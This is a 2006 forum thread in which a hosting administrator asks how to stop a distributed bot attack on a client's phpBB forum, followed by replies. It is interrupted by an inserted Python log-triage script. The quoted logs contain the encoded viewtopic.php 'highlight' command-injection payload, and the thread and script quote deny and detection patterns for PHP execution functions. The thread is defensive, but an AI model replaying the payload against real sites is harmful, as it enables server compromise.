PHP Exploit

Hello,

Today we are under attack. Indeed, one of our clients uses phpBB and we receive a lot of PHP exploit attempts for this client/forum. It is a known exploit which uses viewtopic.php and tries to pass some |exec| PHP command through it (with highlight).

We have a mod_security rule against this, so OK, the attack is stopped, but it is a HUGE attack which occurs every 2s from different hosts every time.

For example, a snapshot of the log of this client:

[Wed May 10 02:14:56 2006] [error] [client 64.38.26.202] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.titan-consortium.com"] [uri "/viewtopic.php?p=3041&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527"] [unique_id -lkWs0FuJIwAAG8uEScAAAAU]

[Wed May 10 02:15:21 2006] [error] [client 213.251.155.9] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.titan-consortium.com"] [uri "/viewtopic.php?t=348&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527"] [unique_id -9LxjkFuJIwAAFddEaQAAAAP]

[Wed May 10 02:15:25 2006] [error] [client 66.225.253.100] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.titan-consortium.com"] [uri "/viewtopic.php?t=598&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527"] [unique_id AA9@CEFuJIwAAF5uEUsAAAAR]

[Wed May 10 02:16:56 2006] [error] [client 66.249.137.42] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.titan-consortium.com"] [uri "/viewtopic.php?t=598&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527"] [unique_id BX0uEUFuJIwAAG8uESoAAAAU]

etc…

Our main problem is that mod_security causes a segfault in httpd after a few minutes and httpd becomes unresponsive.

So we stopped mod_security. We are not really afraid of the attack itself, as in all our vhosts we have an open_basedir directive, wget is chmoded to 700 and moreover our /tmp partition is noexec,nosuid, so we think it should be OK, and it is…

OK, so now all the errors are in httpd/error.log saying wget can't be executed (as we expected).

But there are still all these attacks; it's like a DoS attack, so we also suspended the account.

The attack continues anyway.

In /home/*/var/domain/log/error we still have a huge number of entries like this (every 2s):
[client 209.51.139.74] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 83.96.144.225] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 65.36.153.50] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 66.96.218.165] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 81.177.0.26] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 66.225.253.100] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 195.242.99.146] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 66.249.137.42] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat
[client 70.84.208.170] script '/home/interworx/var/disabled/viewtopic.php' not found or unable to stat

As you can see, the source IP is changing every time, so we can't add the attacker to our firewall.

Do you have an idea how we could stop this attack? (We don't have the money to buy a high-cost Cisco router with anti-DDoS :-p)

Thanks for your advice

Pascal
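A defender-side triage script, added here as an example and not part of this thread or of InterWorx, that parses lines in the shape of the mod_security entries above: it percent-decodes the double-encoded highlight parameter before matching, so the check runs on what phpBB would actually have seen, and it counts distinct source addresses, which is what shows that per-IP firewall rules cannot keep up. The sample lines, the 192.0.2.x / 198.51.100.x / 203.0.113.x addresses, the forum.example.com host and the call-shaped pattern are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample in the shape of the thread's logs (RFC 5737 addresses, example host, shortened payload).
SAMPLE_LOG = """\
[Wed May 10 02:14:56 2006] [error] [client 192.0.2.10] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.example.com"] [uri "/viewtopic.php?p=3041&highlight=%2527%252Esystem(chr(112)%252Echr(101))%252E%2527"] [unique_id AAAAAAAA]
[Wed May 10 02:15:21 2006] [error] [client 198.51.100.7] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.example.com"] [uri "/viewtopic.php?t=348&highlight=%2527%252Esystem(chr(112)%252Echr(101))%252E%2527"] [unique_id AAAAAAAB]
[Wed May 10 02:15:25 2006] [error] [client 203.0.113.5] mod_security: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite)" at THE_REQUEST [hostname "forum.example.com"] [uri "/viewtopic.php?t=598&highlight=%2527%252Esystem(chr(112)%252Echr(101))%252E%2527"] [unique_id AAAAAAAC]
[Wed May 10 02:16:56 2006] [error] [client 192.0.2.10] script '/home/example/var/disabled/viewtopic.php' not found or unable to stat
"""

MODSEC_RE = re.compile(
    r'\[client (?P<client>[\d.]+)\] mod_security: Access denied with code (?P<code>\d+)\.'
    r'.*?\[hostname "(?P<host>[^"]+)"\] \[uri "(?P<uri>[^"]+)"\]')
# Call-shaped pattern (constructed): unlike the bare-word rule in the log, a post title containing "exit" won't trip it.
DANGEROUS_CALL = re.compile(r'\b(system|exec|passthru|shell_exec|popen)\s*\(', re.I)

def decode_fully(value, max_rounds=4):
    """Percent-decode until the string stops changing; the payload in the thread is encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def parse_modsec(line):
    """Return the fields of one mod_security 'Access denied' line, or None for any other line."""
    m = MODSEC_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m['uri'])
    qs = parse_qs(parts.query, keep_blank_values=True)   # parse_qs already decodes one layer
    highlight = decode_fully(qs.get('highlight', [''])[0])
    return {'client': m['client'], 'host': m['host'], 'path': parts.path,
            'highlight': highlight, 'injected': bool(DANGEROUS_CALL.search(highlight))}

def triage(log_text):
    """Summarise blocked requests: how many, from how many distinct sources, how many carry a PHP call."""
    events = [e for e in (parse_modsec(l) for l in log_text.splitlines()) if e]
    return {'blocked': len(events),
            'distinct_clients': len({e['client'] for e in events}),
            'injected': sum(e['injected'] for e in events),
            'top_clients': Counter(e['client'] for e in events).most_common(3)}

if __name__ == '__main__':
    print(triage(SAMPLE_LOG))
```

When distinct_clients tracks blocked one-for-one, as in the thread, the remedy is patching viewtopic.php rather than per-address blocking.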

I'm pretty sure I've seen similar attempts on my box. A fair number of attacks from The Planet datacenter.

Well, as it is a bot, there is nothing to do but install the latest version of the script which has a security issue.

I found that suspending the SiteWorx accounts for a few hours stops the attack. This way it gives us time to patch the script.

Pascal